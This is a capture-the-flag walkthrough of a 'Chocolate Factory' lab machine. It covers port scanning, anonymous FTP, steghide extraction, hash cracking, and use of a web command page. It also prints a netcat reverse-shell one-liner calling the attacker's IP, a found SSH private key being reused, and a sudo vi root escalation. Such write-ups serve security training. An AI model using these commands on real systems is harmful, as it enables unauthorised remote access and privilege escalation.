# Chocolate Factory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbmyHoOAQREIEg5D7At%2F-MbmyM7st0XqG7UYNTvs%2Fimage.png?alt=media\&token=b75342f5-f943-4344-bd09-543868a23d0b) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.46.164 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbmyHoOAQREIEg5D7At%2F-Mbmz6mmaHoN4L8DfC1P%2Fimage.png?alt=media\&token=a5344c0c-9580-4d10-a543-e4c3f10de9d3) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbmzXiRUsfEurSNEq35%2F-Mbn29seXKJgjH7rTtpx%2Fimage.png?alt=media\&token=8f9bb7c9-42de-484c-9ac1-286ac48aabe4) ## Enumeration ### Port 21: FTP Anonymous login is allowed so lets go check it out ``` ftp 10.10.46.164 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2Am6QU066nGLxAqU%2F-Mbn2RARxmR-bVQSwT5W%2Fimage.png?alt=media\&token=e0e8083f-981f-4fca-8086-cef1ad37d068) Lets list the files. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2Am6QU066nGLxAqU%2F-Mbn2Yr6TdMOmctEEc5T%2Fimage.png?alt=media\&token=b3504b4b-ad00-4f1b-92e6-7d0d1d2501c0) Looks like there is one file and it is a image so lets transfer it to our machine ``` get gum_room.jpg ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2Am6QU066nGLxAqU%2F-Mbn2iG89tIjPlMZvTf7%2Fimage.png?alt=media\&token=47403b51-f89a-4432-af92-34129af23d10) Lets look at the image ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnD5LfdmufEYF1sW1T%2Fimage.png?alt=media\&token=5b0e3e62-19fd-461e-b91a-00c3173d4a30) Lets see if there is information hidden in the file, so lets use `steghide`. ``` steghide info gum_room.jpg ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn3yjVlI_FY_JzB_Mg%2Fimage.png?alt=media\&token=e781bdee-85e5-4b8d-815e-6386296b65bd) I hit enter for the passphrase and it worked. We have one file called `b64.txt`, lets extract it. ``` steghide --extract -sf gum_room.jpg ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn4Ajq3xqe0eGwOwoL%2Fimage.png?alt=media\&token=6db528e9-d450-4a3e-bb1a-138ba8869dfc) Lets read the file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn4FmjP1g9Hma7uadS%2Fimage.png?alt=media\&token=df9cf4f3-b085-47fe-ae4f-c71e5efeb4a1) Lets decode it. After decoded this is the output. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn4gwru3tMNrSSlAqo%2Fimage.png?alt=media\&token=2cfae13f-8fd1-4954-8d38-d5fa1a71b6a7) We have the password hash for the user `Charlie`. Lets use hashcat to crack this hash to get the password for Charlie. Copy the hash into a file called `hash.txt`. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn5H9SYnLwY8e7-MvS%2Fimage.png?alt=media\&token=1e3a25b9-122c-4cd9-98db-c02d1773f5d1) And now lets use `hashcat` to crack it. ```bash hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnB4NVZPRriY9jk8Qs%2Fimage.png?alt=media\&token=9f954e09-5c2f-408d-9ef6-f11b92624e80) We found the `password: cn7824` , lets try to login through ssh. ```bash ssh charlie@10.10.46.164 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnBO4rpdqP-QozvMgx%2Fimage.png?alt=media\&token=4af51fd4-3131-4973-8e60-59d07bb50847) Looks like this is not the password for ssh, lets go explore port 80 ### Port 80: HTTP Lets visit the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnAxmFR5YyXQnD6tKP%2Fimage.png?alt=media\&token=ab09aa6b-3bfb-4868-b2c2-02e099287ea1) Its a login page, remember the credentials we found, lets use them to login. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnB_nFPdy6hcPexDkR%2Fimage.png?alt=media\&token=e36fdd20-a666-4cad-9d2d-30ff313a5279) We logged in , looks like we can run commands, and normal commands work so lets run a reverse shell and get a reverse shell, lets first start a netcat listener ```bash nc -lvnp 1234 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnBothtnUWGk1N65vD%2Fimage.png?alt=media\&token=9fc47540-0b4a-4e11-bdbb-5744c76e90f5) Lets get a reverse shell from [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f ``` Lets execute this command, and we get a reverse shell on the machine ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnCGSAFB4powThNzIh%2Fimage.png?alt=media\&token=2afa72ce-2d10-4a9c-9a0b-7a7fe590370b) Lets stabilize this shell, using these commands ```bash python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo; fg reset Ctrl + C export TERM=xterm-color ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnCYogC1qT4gqIXlFZ%2Fimage.png?alt=media\&token=d5a5efce-3d39-4e62-91f6-759305e2a519) Lets list the files in the current directory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnCjvr0EhmIZinvUhF%2Fimage.png?alt=media\&token=a46f765a-1c92-4e49-b540-30d00178e164) We have a `validate.php` file, lets read it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnDEpDpsdlehKat3H7%2Fimage.png?alt=media\&token=e55d287c-6dba-44da-9665-7f4c90200c3e) We see the credentials we just used to login in the web page. I tried to run the key file but it said permission denied ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnDnUCRTzLTlxjl2sI%2Fimage.png?alt=media\&token=744f3274-beb5-48e7-b9c3-51d2a6255a4e) So I used a command that lets us look at some information which is called `strings` and it gave me important information ```bash strings key_rev_key ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnE5LE7e3L5Nou5kB5%2Fimage.png?alt=media\&token=34e1408b-1515-4364-8063-791c7ea9c718) We have a key. With this information we can answer two questions in the room ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnECknfX18oWjAr83F%2Fimage.png?alt=media\&token=980523eb-498f-4368-b04e-3b832a9f2939) I was enumerating when I realized that we can change directories into Charlie, so I listed the files and found the `user.txt` and some other files. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnF7jg1dAW71ENHOsY%2Fimage.png?alt=media\&token=8ac96788-0cbd-47d1-ac2d-87d97a5818e8) Lets read the teleport file. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnFLsO9WHlxLtQdckd%2Fimage.png?alt=media\&token=d1608d57-e6ae-4fb2-b7ea-1271a2e61a07) Its a rsa private key, we can use this to login as `charlie` through ssh, lets do that. First copy the contents of the file into a file on your machine called `id_rsa`. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnFiJ-5qzIPUaPrNJX%2Fimage.png?alt=media\&token=b43949b4-5322-4e46-9d82-2a351ebadfc2) Now we should change the permissions of the file ```bash chmod 600 id_rsa ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnFueZniGk5NXgCNIA%2Fimage.png?alt=media\&token=a2f4bd43-c94a-4eee-aba7-815614baed54) Now lets login ```bash ssh -i id_rsa charlie@10.10.46.164 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnG5eZY1JvsD7r-IB7%2Fimage.png?alt=media\&token=c1eee460-24c2-424e-babb-ef49b05c5dce) We are logged in. ## Privilege Escalation Lets run `sudo -l` to see what we can run as root ```bash sudo -l ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnGWduFlBgURDowrka%2Fimage.png?alt=media\&token=66c3db24-b64d-458a-ad53-10284dae3bde) Looks like we can run `/usr/bin/vi` as root so lets go to [GTFOBins ](https://gtfobins.github.io/gtfobins/vi/#sudo)to find the commands to escalate our privilege to root. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnGjVioryi2EkVXJ7U%2Fimage.png?alt=media\&token=5e652a95-f12c-4572-868e-977546f4a9c1) Lets run this command ```bash sudo vi -c ':!/bin/sh' /dev/null ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnGrlL0R8QJZqt9LZa%2Fimage.png?alt=media\&token=0de644a9-75bb-4d05-ae9f-d1cbbb4e6643) We are now root, lets cd into the root folder to find the root flag, it looks like we need to run a python script to get the flag, lets run it, oh its asking for a key, remember when we found the key during enumeration, type that in and you should get the flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnHh0aYXsq8jk0tMji%2Fimage.png?alt=media\&token=7dc817a5-b44a-435c-a216-328c8f3cfa25)